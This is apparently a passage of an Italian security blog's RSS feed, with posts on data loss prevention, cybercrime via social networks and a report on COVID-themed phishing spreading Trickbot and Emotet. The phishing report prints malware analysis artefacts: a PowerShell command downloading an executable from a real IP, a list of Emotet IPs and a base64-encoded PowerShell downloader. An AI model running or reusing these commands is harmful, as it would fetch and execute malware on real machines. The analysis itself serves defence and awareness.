&lt;h3 id=&#34;data-protection-da-dove-partire&#34;&gt;Data Protection: da dove partire?&lt;/h3&gt;

&lt;p&gt;Per strutturare un sistema di Data Loss Prevention realmente efficiente ed efficace occorre, ovviamente, definire innanzitutto un piano d’azione che comprenda i seguenti passaggi:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Definire il dominio principale di protezione.&lt;/strong&gt; È necessario intervistare i propri utenti per identificare i tipi di dato che vengono scambiati e dove vengono memorizzati. È buona norma, inoltre, non fermarsi solo alla parte IT che ha una visione prettamente tecnica, ma ragionare su altri reparti (amministrazione, progettazione, magazzino ecc.). L’obiettivo di questa prima fase è riuscire a mappare i processi di business con i dati che questi generano o utilizzano e le implicazioni che questi possono avere in caso di perdita è sicuramente essenziale per giustificare qualunque investimento. Come ultima azione, occorre identificare quali sono i dati più sensibili per l’azienda e per cui la loro sottrazione o perdita possa impattare pesantemente il business, non limitandosi solo agli ambiti HR e Finance, ma approfondendo gli ambiti con maggiore proprietà intellettuale dell’azienda.&lt;/p&gt;&lt;/li&gt;

&lt;li&gt;&lt;p&gt;&lt;strong&gt;Verificare di avere un piano di backup completo che tenga conto delle effettive esigenze.&lt;/strong&gt; Eseguire test di restore a intervalli regolari per verificare la bontà del sistema è buona prassi. Separare, poi, le utenze amministrative che sono utilizzate sui sistemi da quelle utilizzate dai tool di backup per evitare, ad esempio, che un attacco di un ransomware possa danneggiare anche i backup con relativo impatto esteso sul business. Valutare, infine, di mettere offline parte di questi dati per proteggerli ulteriormente.&lt;/p&gt;&lt;/li&gt;

&lt;li&gt;&lt;p&gt;&lt;strong&gt;Fissare il punto di partenza.&lt;/strong&gt; A questo punto è necessario far eseguire un security assessment e/o un compromise assessment da un ente esterno che possa verificare le misure messe in campo. Tali attività devono includere l’uso di tool, ma anche interviste verso le figure chiave e apicali dell’azienda e proporre un piano di remediation o mitigation dei rischi trovati. Per l’IT è importante analizzare gli output prodotti, calandoli all’interno dell’azienda per:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;evidenziare le aree scoperte;&lt;/li&gt;
&lt;li&gt;definire il dominio critico;&lt;/li&gt;
&lt;li&gt;pianificare le misure di emergenza per risolvere le maggiori criticità;&lt;/li&gt;
&lt;li&gt;pianificare un programma a medio e lungo termine che verrà aggiornato con l’evoluzione del business.&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;

&lt;li&gt;&lt;p&gt;&lt;strong&gt;Rivedere, se presenti, i piani di &lt;em&gt;business continuity&lt;/em&gt;, &lt;em&gt;disaster recovery&lt;/em&gt; e le procedure per eventuali data breach&lt;/strong&gt;. Non è sufficiente avere un ricco documento, ma è necessario pianificare test periodici e valutarne l’effettiva efficacia in casi reali. Per fare un esempio, l’emergenza covid-19 ha obbligato le azienda a cambiare profondamente l’erogazione del lavoro dei propri dipendenti e aver avuto un piano che valutasse l’impossibilità di accedere agli edifici aziendali avrebbe permesso di rispondere in modo coordinato a questa emergenza.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;h3 id=&#34;siamo-tutti-al-centro-di-un-attacco-informatico&#34;&gt;Siamo tutti al centro di un attacco informatico&lt;/h3&gt;

&lt;p&gt;Il mercato della criminalità informatica e l’evoluzione di questi ultimi anni ci hanno reso consci che siamo tutti possibili obiettivi dei cyber criminali. Si leggono ogni giorno articoli o notizie legato alla sottrazione dei dati di società di ogni settore merceologico, dal bancario al manufacturing, dai trasporti ai vari e-commerce.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/sistemi-data-loss-prevention/data-loss-prevention-cyber-attack.jpg&#34; alt=&#34;i-sistemi-di-data-loss-prevention&#34; /&gt;&lt;/p&gt;

&lt;p&gt;Esserne consapevoli ci mette di fronte alla necessità di prendere precauzioni complete. Dotarsi di software avanzanti per la protezione dei dispositivi dei nostri utenti con funzioni avanzate di antimalware e di EDR è sicuramente un passo obbligato per rispondere a questa esigenza, partendo dal device.&lt;/p&gt;

&lt;p&gt;Dall’altra parte è necessario inserire soluzioni di IDS (intrusione Detection System) e IPS per il monitoraggio e protezione della rete, sia essa interna che esterna.&lt;/p&gt;

&lt;p&gt;Aggiungiamo inoltre la necessità di correlare i vari eventi generati da fonti diverse (AD, sistemi operativi, dispositivi di rete, sistemi di controllo avanzato del traffico di rete ecc.) e quindi è necessario valutare l’inserimento di un SIEM.&lt;/p&gt;

&lt;p&gt;In questo percorso verso l’incremento della protezione in azienda e valutando il valore che i dati hanno, possiamo ragionare sull’inserimento di un software avanzato di Data Protection che sappia monitorare, tracciare e controllare i dati che transitano all’interno dell’azienda.&lt;/p&gt;

&lt;h3 id=&#34;non-solo-tool-e-software&#34;&gt;Non solo tool e software&lt;/h3&gt;

&lt;p&gt;Concludiamo questo approfondimento con alcune considerazioni:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;p&gt;I processi interni devono essere rivisti a fronte della &lt;strong&gt;criticità delle informazioni e dei dati trattati&lt;/strong&gt;. Come vengono scambiate le informazioni sensibili? Chi gestisce e ha la responsabilità di tali processi?&lt;/p&gt;&lt;/li&gt;

&lt;li&gt;&lt;p&gt;&lt;strong&gt;Le competenze sono il punto chiave&lt;/strong&gt; per poter gestire nel tempo questa complessità. Se ragioniamo sulla necessità di inserire un SOC, la valutazione dei costi e benefici ci porterà probabilmente a esternalizzare tale servizio. Aggiungiamo inoltre la difficoltà di gestire e coordinare tutte le soluzioni software presenti in azienda.&lt;/p&gt;&lt;/li&gt;

&lt;li&gt;&lt;p&gt;Avere sovrapposizioni di aree di sicurezza è sicuramente un costo aggiuntivo, ma ci permette di &lt;strong&gt;rispondere prontamente a eventuali incident.&lt;/strong&gt; Ad esempio, se il sistema di antispam lascia passare una mail malevola, gli strumenti di protezione del client potrebbero bloccare un’eventuale infezione.&lt;/p&gt;&lt;/li&gt;

&lt;li&gt;&lt;p&gt;&lt;strong&gt;Il tempo è nemico di ogni organizzazione IT e non IT&lt;/strong&gt;. Tali sistemi di protezione devono essere costantemente manutenuti e tenuti aggiornati.&lt;/p&gt;&lt;/li&gt;

&lt;li&gt;&lt;p&gt;&lt;strong&gt;Procedere per step:&lt;/strong&gt; non inserire un cambiamento ad un processo o un nuovo software senza aver definito il beneficio e misurato nel tempo.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
</description>
       </item>
       
       <item>
         <title>Cybercrime e Social Network: un binomio da non sottovalutare</title>
         <link>https://blog.cybergon.com/posts/cybercrime-e-social-network-un-binomio-da-non-sottovalutare/</link>
         <pubDate>Mon, 25 May 2020 14:16:01 +0000</pubDate>
         <authors>
         
              
             <author>Sara Loprete</author>
         
         </authors>
         <guid>https://blog.cybergon.com/posts/cybercrime-e-social-network-un-binomio-da-non-sottovalutare/</guid>
         <description>

&lt;p&gt;Social, curiosi e sempre connessi: è il ritratto dell&amp;rsquo;italiano in rete.&lt;/p&gt;

&lt;p&gt;Dalle ultime statistiche di &lt;a href=&#34;https://wearesocial.com/it/blog/2020/02/report-digital-2020-in-italia-cresce-ancora-lutilizzo-dei-social&#34;&gt;WeAreSocial&lt;/a&gt; sono quasi 50 milioni le persone online in Italia, e 35 milioni quelle presenti ed attive sui canali social con una media di 1 ora e 57 minuti trascorsi al giorno sulle piattaforme.
Il lockdown, inoltre, ha avuto l&amp;rsquo;effetto di amplificare la fruizione delle piattaforme social con un considerevole &lt;a href=&#34;https://www.franzrusso.it/condividere-comunicare/coronavirus-italia-uso-social-media-30-percento/&#34;&gt;incremento del 30% in Italia&lt;/a&gt;.
Con un pool di utenti di questa portata, il Cybercrime non poteva astenersi dall’approfittarne.&lt;/p&gt;

&lt;p&gt;In realtà non si tratta di una novità, è ormai diversi anni infatti che i criminali informatici sfruttano i social media per veicolare i loro attacchi. Già nel 2018, per esempio, Trend Micro aveva rilevato l’utilizzo dei MEME per diffondere &lt;strong&gt;Malware utilizzando la steganografia&lt;/strong&gt;, la tecnica utile a nascondere un messaggio all’interno di un mezzo contenitore.
I MEME scaricati lanciavano l&amp;rsquo;esecuzione di un Malware, dando la possibilità ai cyber criminali di registrare screenshot, carpire i copia e incolla e leggere la lista dei processi attivi sul dispositivo infetto.&lt;/p&gt;

&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th align=&#34;center&#34;&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/cybercrime-social-network/cyber-crime-social-network-meme.png&#34; alt=&#34;cyber-crime-social-network-meme&#34; /&gt;&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;

&lt;tbody&gt;
&lt;tr&gt;
&lt;td align=&#34;center&#34;&gt;&lt;em&gt;Uno degli account Twitter che ha diffuso immagini contenenti codici malevoli&lt;/em&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;

&lt;p&gt;Il fatto che queste attività illecite siano ampiamente diffuse purtroppo non garantisce che le persone ne siano perfettamente al corrente, soprattutto considerando che &lt;strong&gt;gli attacchi informatici sono in continua evoluzione&lt;/strong&gt;.&lt;/p&gt;

&lt;h3 id=&#34;la-troppa-fiducia-è-il-problema-alla-radice&#34;&gt;La (troppa) fiducia è il problema alla radice&lt;/h3&gt;

&lt;p&gt;Facebook nasce nel 2004 e nel 2008 arriva in Italia. Seguito poi da YouTube, Twitter, Linkedin, Instagram… Cos’è successo in questo decennio di social network?&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/cybercrime-social-network/cyber-crime-social-network.jpg&#34; alt=&#34;cyber-crime-social-network&#34; /&gt;&lt;/p&gt;

&lt;p&gt;Le piattaforme sono diventate uno dei principali canali di comunicazione con i nostri contatti. Abbiamo creato – tramite le cosiddette “amicizie” - una catena di persone che si fidano tra loro pensando che questo ci garantisca l’autenticità della comunicazione e, di conseguenza, abbassiamo la guardia.&lt;/p&gt;

&lt;p&gt;È proprio l’elemento fiducia che i cyber criminali sfruttano per le loro frodi. Bromium e il Dr. Michael McGuire in &lt;a href=&#34;https://www.bromium.com/wp-content/uploads/2019/02/Bromium-Web-of-Profit-Social-Platforms-Report.pdf&#34;&gt;“Social Media Platforms and the Cybercrime Economy”&lt;/a&gt; illustrano come i social più popolari siano stati usati dai criminali informatici per ottenere i mezzi necessari per “amplificare, persuadere e diffondere i malware più rapidamente rispetto a email o altri vettori di attacco” e arrivare a &lt;strong&gt;guadagnare più di 3 miliardi di dollari a livello globale ogni anno&lt;/strong&gt;, così suddivisi:&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/cybercrime-social-network/cyber-crime-social-network-guadagni.PNG&#34; alt=&#34;cyber-crime-social-network-guadagni&#34; /&gt;
*&lt;em&gt;Cryptomining: tipologia di malware che sfrutta i computer per generare cryptovalute senza che la vittima se ne accorga.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;I metodi con cui i cyber criminali attaccano gli utenti sono tipicamente:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Pubblicità ingannevoli&lt;/strong&gt;:sono noti i casi di Ray-Ban e Nike, attraverso le cui pubblicità fake l’utente viene spinto a cliccare con conseguente infezione della macchina;&lt;/p&gt;&lt;/li&gt;

&lt;li&gt;&lt;p&gt;&lt;strong&gt;Plug-in e App&lt;/strong&gt;: negli anni scorsi hanno preso piede i giochi e i test di personalità. Almeno il 60% delle infezioni su Facebook, deriva dai download di questi tool;&lt;/p&gt;&lt;/li&gt;

&lt;li&gt;&lt;p&gt;&lt;strong&gt;Post, foto e video&lt;/strong&gt;: le notifiche sono il fulcro dei social. Se vieni “taggato” da un amico in una foto o se ti viene segnalato un video che sembra divertente, perché non cliccarci sopra o scaricarlo? I cyber criminali hanno subito compreso la potenzialità di questi messaggi, nascondendo all’interno di notifiche e degli oggetti stessi la possibilità di scaricare malware sui device delle vittime;&lt;/p&gt;&lt;/li&gt;

&lt;li&gt;&lt;p&gt;&lt;strong&gt;Phishing&lt;/strong&gt;: non solo mail. La tecnica che prevede l’inganno dell’utente la fa da padrona su ogni tipo di social media. LinkedIn, la piattaforma dedicata ai network professionali, è considerata dagli utenti più sicura ed è più facile accettare collegamenti di persone di secondo o terzo grado e aprire messaggi con collegamenti malevoli. Il risultato è che il 68% degli utenti LinkedIn che riceve una mail o messaggio malevolo, clicca sul link. Un esempio recente riguarda il &lt;a href=&#34;https://www.difesaesicurezza.com/cyber/coronavirus-boom-di-richieste-di-amicizia-su-facebook-del-cybercrime/&#34;&gt;boom di richieste su Facebook&lt;/a&gt; per proporre finanziamenti agevolati.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href=&#34;https://hub.cybergon.com/iscriviti-ai-corsi-sulla-sicurezza-informatica&#34;&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/cybercrime-social-network/corsi-1.PNG&#34; alt=&#34;corsi-1&#34; /&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3 id=&#34;un-caso-particolare-la-piattaforma-come-canale-di-comunicazione-nelle-operazioni-criminali&#34;&gt;Un caso particolare: la piattaforma come canale di comunicazione nelle operazioni criminali&lt;/h3&gt;

&lt;p&gt;Un uso particolare delle piattaforme viene fatto da alcune organizzazioni criminali che si servono dei social network come “intermediari” per la comunicazione con i loro &lt;em&gt;Server C&amp;amp;C - comando e controllo&lt;/em&gt; – ovvero macchine controllate dai cyber criminali stessi e che vengono utilizzate per gestire i dispositivi infetti e rubare quindi i dati delle vittime. Gli attaccanti &lt;strong&gt;usando i social network possono ingannare i reparti di sicurezza delle organizzazioni&lt;/strong&gt; che vedranno apparentemente delle legittime connessioni generate dall&amp;rsquo;utente.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/cybercrime-social-network/cyber-crime-social-network-twitter.jpg&#34; alt=&#34;cyber-crime-social-network-twitter&#34; /&gt;&lt;/p&gt;

&lt;p&gt;Una &lt;a href=&#34;https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/hunting-threats-on-twitter&#34;&gt;ricerca di Trend Micro&lt;/a&gt; ha evidenziato l’uso di Twitter come canale di comunicazione per controllare i &lt;em&gt;Server C&amp;amp;C&lt;/em&gt; e passarsi informazioni con le macchine infettate da &lt;strong&gt;Anubis, un tipo di banking malware&lt;/strong&gt; che colpisce dispositivi Android a seguito del download da Play Store di due App malevole (prontamente rimosse da Google). Altri malware coinvolti in queste comunicazioni sono, ad esempio, FakeSpy o Elirks.&lt;/p&gt;

&lt;h3 id=&#34;la-consapevolezza-dell-utente-è-fondamentale-per-la-sicurezza&#34;&gt;La consapevolezza dell&amp;rsquo;utente è fondamentale per la sicurezza&lt;/h3&gt;

&lt;p&gt;Vogliamo porre l’accento su questo tema oggi, perché l’incremento del lavoro da casa – che ci immaginiamo possa essere anche esponenziale e duraturo nel tempo – dà origine a &lt;strong&gt;una crescita del rischio di cadere nella trappola degli attacchi eseguiti tramite social network&lt;/strong&gt; e di compromettere quindi il network aziendale, in particolare:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;p&gt;Spesso i collaboratori si servono di un unico device per uso professionale/personale, accedendo quindi anche a piattaforme, per scopi lavorativi o meno;&lt;/p&gt;&lt;/li&gt;

&lt;li&gt;&lt;p&gt;La connessione di casa propria si trova naturalmente al di fuori del perimetro di difesa di un’azienda. Ovviamente una VPN (Virtual Private Network) sicura riduce i rischi di intromissioni nella rete, tuttavia non basta.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th align=&#34;center&#34;&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/cybercrime-social-network/cyber-crime-social-network-smart-working.png&#34; alt=&#34;cyber-crime-social-network-smart-working&#34; /&gt;&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;

&lt;tbody&gt;
&lt;tr&gt;
&lt;td align=&#34;center&#34;&gt;&lt;em&gt;L’adozione dello Smart Working secondo una ricerca di Fondirigenti su un campione di 800 aziende italiane&lt;/em&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;

&lt;p&gt;Il risultato di questo fenomeno è che gli utenti utilizzano i social network esponendo a un rischio maggiore i propri dati e, verosimilmente, quelli stessi dell’azienda e dei colleghi per estensione.
Comprendere il ruolo che giocano i social network nell’ampissimo mondo del Cybercrime è fondamentale per un’organizzazione, per &lt;strong&gt;innalzare il livello di difesa&lt;/strong&gt; ed &lt;strong&gt;educare i propri dipendenti alla sicurezza e al valore del dato&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;Il cambiamento culturale è faticoso: i comportamenti da mettere in campo in ufficio, in Smart Working, nella vita privata, devono essere sicuri.
La consapevolezza infatti è sempre un tassello fondamentale quando si parla di Cyber Security.&lt;/p&gt;

&lt;p&gt;All’inizio del lockdown, durante l’emergenza sanitaria, abbiamo deciso di lanciare la campagna #prepariamociallaripresa: &lt;strong&gt;due corsi gratuiti su temi di sicurezza informatica per utenti non provenienti dal mondo IT&lt;/strong&gt;. Lo scopo di questa iniziativa di solidarietà digitale era aiutare le aziende ad essere preparate e non cadere vittima di attacchi informatici, soprattutto a seguito dell’implementazione del lavoro da casa.&lt;/p&gt;

&lt;p&gt;La &amp;ldquo;fase 1&amp;rdquo; è stata caratterizzata da un incremento sostanziale di e-mail di &lt;a href=&#34;https://cybergon.com/blog/posts/phishing-ai-tempi-dello-smartworking-un-report/&#34;&gt;phishing a tema coronavirus&lt;/a&gt;; ipotizziamo che durante questo periodo sia stata fatta una raccolta massiva di credenziali che le organizzazioni criminali utilizzeranno a partire dalla &amp;ldquo;fase 2&amp;rdquo;, con il ritorno progressivo alle attività in azienda.&lt;/p&gt;

&lt;p&gt;In aggiunta a questo non possiamo dimenticarci che &lt;strong&gt;servizi specialistici, come quelli di Detection e Response&lt;/strong&gt; sono fondamentali per rintracciare le minacce, soprattutto quando si parla di lavoro da casa, dove l’infrastruttura potrebbe essere più vulnerabile agli attacchi esterni.
Un team di specialisti di sicurezza informatica è necessario per &lt;strong&gt;strutturare strategie di difesa per l’azienda&lt;/strong&gt; e usufruire di strumenti di rilevamento di minacce per individuare eventuali segnali di violazione di dati.&lt;/p&gt;

&lt;hr /&gt;

&lt;p&gt;&lt;a href=&#34;https://hub.cybergon.com/iscriviti-ai-corsi-sulla-sicurezza-informatica&#34;&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/cybercrime-social-network/corsi-2.PNG&#34; alt=&#34;corsi-2&#34; /&gt;&lt;/a&gt;&lt;/p&gt;
</description>
       </item>
       
       <item>
         <title>Il phishing ai tempi dello smartworking: un report sugli attacchi più diffusi</title>
         <link>https://blog.cybergon.com/posts/phishing-ai-tempi-dello-smartworking-un-report/</link>
         <pubDate>Tue, 28 Apr 2020 13:46:01 +0000</pubDate>
         <authors>
         
              
             <author>Marco Nilo</author>
         
         </authors>
         <guid>https://blog.cybergon.com/posts/phishing-ai-tempi-dello-smartworking-un-report/</guid>
         <description>

&lt;p&gt;La diffusione del Covid-19 ha avuto un impatto enorme sulle nostre vite e sulla nostra economia, ma dove noi vediamo difficoltà e criticità, &lt;a href=&#34;https://cybergon.com/blog/posts/cybercrime-e-cybersecurity-intelligence-come-leva-per-la-difesa-della-tua-organizzazione/&#34;&gt;l’industria del Cybercrime vede un’occasione&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;L’emergenza sanitaria infatti non è stata sufficiente per frenare &lt;strong&gt;campagne e tentativi di phishing&lt;/strong&gt;. Al contrario, il numero di attacchi in questo periodo si è intensificato, approfittando anche della diffusa e obbligata tendenza allo &lt;em&gt;smartworking&lt;/em&gt;, che in alcuni casi ci ha colto impreparati.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/phishingreport/smartworking.jpg&#34; alt=&#34;smartworking&#34; /&gt;&lt;/p&gt;

&lt;p&gt;Abbiamo svolto &lt;strong&gt;un’analisi dei più diffusi attacchi&lt;/strong&gt; e mentre gli oggetti e i testi delle e-mail cambiano da caso a caso, possiamo affermare che i file e le infezioni che si nascondono all’interno dei messaggi sono piuttosto comuni e diffusi.&lt;/p&gt;

&lt;h3 id=&#34;l-inizio-degli-attacchi-e-il-picco-di-infezioni&#34;&gt;L&amp;rsquo;inizio degli attacchi e il picco di infezioni&lt;/h3&gt;

&lt;p&gt;Come segnalato dal &lt;a href=&#34;https://www.cert-pa.it/category/covid19/&#34;&gt;CERT-PA (Computer Emergency Response Team per la pubblica amministrazione)&lt;/a&gt; nelle ultime settimane, gli attacchi hanno avuto inizio dai primi giorni di Marzo e si sono protratti per i successivi due mesi, fino ad ora, in cui &lt;strong&gt;si è avuto un picco di infezioni&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;Gli oggetti delle mail in questione – bisogna dirlo – non sono particolarmente fantasiosi , tuttavia in un periodo di emergenza come questo possiamo immaginare che &lt;strong&gt;un utente poco attento o poco esperto sia incuriosito e spinto ad aprire una mail&lt;/strong&gt; con un oggetto riguardante il tema più importante del momento.
Per fare qualche esempio: abbiamo notizie di comunicazioni dall’oggetto &lt;em&gt;“Corona virus cure for china, italy”&lt;/em&gt;; altri tentativi che,approfittando dell’intensa corsa agli acquisti online, fanno leva su oggetti come &lt;em&gt;“Cancel shipment due to corona virus – new shipping details”&lt;/em&gt; o ancora &lt;em&gt;“New COVID-19 prevention and treatment information”&lt;/em&gt; per comunicare presunte informazioni su prevenzioni e trattamenti da seguire.&lt;/p&gt;

&lt;p&gt;Nonostante la varietà degli argomenti e dei contenuti delle mail, &lt;strong&gt;i malware veicolati attraverso gli allegati di queste comunicazioni sono già noti: Trickbot, Ursnif ed Emotet&lt;/strong&gt;. Si tratta di malware in circolazione ormai da anni e che ciclicamente vengono ritoccati per provare a renderli non rintracciabili da soluzioni anti-malware.&lt;/p&gt;

&lt;h3 id=&#34;esempi-e-analisi-delle-mail-di-phishing-in-circolazione&#34;&gt;Esempi e analisi delle mail di phishing in circolazione&lt;/h3&gt;

&lt;p&gt;Vediamo nello specifico alcuni esempi di mail malevole che trascinano con sé allegati in grado di infettare la macchina con uno dei malware sopra citati.&lt;/p&gt;

&lt;h3 id=&#34;esempio-n-1-trickbot&#34;&gt;Esempio n°1: Trickbot&lt;/h3&gt;

&lt;p&gt;Il primo esempio è una mail dall’oggetto “Coronavirus: informazioni importanti su precauzioni” che sta circolando in queste settimane. L’e-mail, che pretende di contenere delle precauzioni, ha come allegato un documento word comunemente tipicamente nominato: &lt;em&gt;“f21368535400.doc”&lt;/em&gt;, &lt;em&gt;“Covid_19_test_form.doc”&lt;/em&gt;, &lt;em&gt;“guida_coronavirus.doc”&lt;/em&gt;, ecc.&lt;/p&gt;

&lt;p&gt;C’è più di una variante di questa mail e più di una variante dell’allegato annesso, ma il flusso è praticamente lo stesso: l’utente &lt;strong&gt;viene indotto ad aprire il documento&lt;/strong&gt; e ad eseguire (volontariamente o involontariamente in base ai settaggi sull’abilitazione) delle macro. Il codice della macro esegue il download di un file - &lt;strong&gt;appartenente alla famiglia “Trickbot”&lt;/strong&gt; - che ha il compito di infettare la macchina della vittima. Il documento word si presenta in questa maniera:&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/phishingreport/trickbot-word-document.png&#34; alt=&#34;trickbot-word-document&#34; /&gt;&lt;/p&gt;

&lt;p&gt;In questo caso, l’utente viene ingannato e spinto ad abilitare e ad eseguire la macro. Il codice della macro è chiaramente offuscato ma, deoffuscandolo e facendo esplodere il file in una sandbox,&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/phishingreport/trickbot-codice-esploso-sandbox.png&#34; alt=&#34;trickbot-codice-esploso-sandbox&#34; /&gt;&lt;/p&gt;

&lt;p&gt;il codice prova a collegarsi ad un server all’IP 37.1.212.70 attraverso il seguente comando:&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;powershell -Command &amp;quot;(New-Object Net.WebClient).DownloadFile(&#39;http://37.1.212.70/doc/Cirilic.exe&#39;, &#39;C:&#39; + &#39;\U&#39; + &#39;ser&#39; + &#39;s\P&#39; + &#39;ub&#39; + &#39;lic&#39; + &#39;\ca&#39; + &#39;lc&#39; + &#39;.ex&#39; + &#39;e&#39;)&amp;quot;
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;Prova quindi ad effettuare il download di un eseguibile per poi farlo girare sulla macchina per infettarla.&lt;/p&gt;

&lt;h3 id=&#34;esempio-n-2-emotet&#34;&gt;Esempio n°2: Emotet&lt;/h3&gt;

&lt;p&gt;Il secondo esempio che abbiamo analizzato è &lt;strong&gt;una mail che prova a diffondere Emotet&lt;/strong&gt;. Il documento è simile, anche in questo mostra un messaggio che tende ad ingannare l’utente con l’accettazione di un license agreement:&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/phishingreport/emotet-word-document.png&#34; alt=&#34;emotet-word-document&#34; /&gt;&lt;/p&gt;

&lt;p&gt;Il codice anche in questo caso è offuscato, ma ciò che fa prima di tutto è cercare di contattare più di un IP, per verificare la presenza di connettività:&lt;/p&gt;

&lt;p&gt;181.188.149.134&lt;/p&gt;

&lt;p&gt;203.130.0.67&lt;/p&gt;

&lt;p&gt;5.67.96.120&lt;/p&gt;

&lt;p&gt;143.0.245.169&lt;/p&gt;

&lt;p&gt;104.27.132.137&lt;/p&gt;

&lt;p&gt;Lo scopo è effettuare il download dell’eseguibile necessario all’infezione della macchina vittima. In particolare, il comando eseguito è il seguente:&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;powershell –enco JABqAHIARgBoAEEAMAA9ACcAVwBmADEAcgBIAHoAJwA7ACQAdQBVAE0ATQBMAEkAIAA9ACAAJwAyADgANAAnADsAJABpAEIAdABqADQAOQBOAD0AJwBUAGgATQBxAFcAOABzADAAJwA7ACQARgB3AGMAQQBKAHMANgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAdQBVAE0ATQBMAEkAKwAnAC4AZQB4AGUAJwA7ACQAUwA5AEcAegBSAHMAdABNAD0AJwBFAEYAQwB3AG4AbABHAHoAJwA7ACQAdQA4AFUAQQByADMAPQAmACgAJwBuACcAKwAnAGUAdwAnACsAJwAtAG8AYgBqAGUAYwB0ACcAKQAgAE4AZQBUAC4AdwBFAEIAQwBsAEkARQBuAHQAOwAkAHAATABqAEIAcQBJAE4ARQA9AccAaAB0AHQAcAA6AC8ALwBiAGwAbwBjAGsAYwBoAGEAaQBuAGoAbwBiAGwAaQBzAHQALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvADAAMQA0ADAAOAAwAC8AQABoAHQAdABwAHMAOgAvAC8AdwBvAG0AZQBuAGUAbQBwAG8AdwBlAHIAbQBlAG4AdABwAGEAawBpAHMAdABhAG4AlgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAHAAYQBiAGEANQBxADUAMgAvAEAAaAB0AHQAcABzADoALwAvAGEAdABuAGkAbQBhAG4AdgBpAGwAbABhAC4AywBvAG0AlwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AMAA3ADMANwAzADUALwBAAGgAdAB0AHAAcwA6AC8AlwB5AGUAdQBxAHUAeQBuAGgAbgBoAGEAaQAuAGMAbwBtAC8AdQBwAGwAbwBhAGQALwA0ADEAOAAzADAALwBAAGgAdAB0AHAAcwA6AC8ALwBkAGUAZQBwAGkAawBhAHIAYQBpAC4AywBvAG0ALwBqAHMALwA0AGIAegBzADYALwAnAC4AIgBzAFAATABgAGkAVAAiACgAJwBAACcAKQA7ACQAbAA0AHMASgBsAG8ArwB3AD0AjwB6AEkAUwBqAEUAbQBpAFAAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFYAMwBoAEUAUABNAE0AWgAgAGkAbgAgACQAcABMAGoAQgBxAEkATgBFACkAewB0AHIAeQB7ACQAdQA4AFUAQQByADMALgAiAEQATwB3AGAATgBgAGwATwBhAEQAZgBpAGAATABlACIAKAAkAFYAMwBoAEUAUABNAE0AWgAsACAAJABGAHcAYwBBAEoAcwA2ACkAOwAkAEkAdgBIAEgAdwBSAGkAYgA9AccAcwA1AFQAcwBfAGkAUAA4ACcAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlACcAKwAnAHQALQBJAHQAZQBtACcAKQAgACQARgB3AGMAQQBKAHMANgApAC4AIgBMAGUATgBgAGcAVABoACIAIAAtAGcAZQAgADIAMwA5ADMAMQApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAFQAYABBAHIAVAAiACgAJABGAHcAYwBBAEoAcwA2ACkAOwAkAHoARABOAHMAOAB3AGkAPQAnAEYAMwBXAHcAbwAwACcAOwBiAHIAZQBhAGsAOwAkAFQAVABKAHAAdABYAEIAPQAnAGkAagBsAFcAaABDAHoAUAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJAB2AfoAegBpAF8AdQBBAHAAPQAnAGEARQBCAHQAcABqADQAJwA=
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;C’è solo un livello di codifica e non è complicato individuare il codice nascosto e capirne lo scopo:&lt;/p&gt;

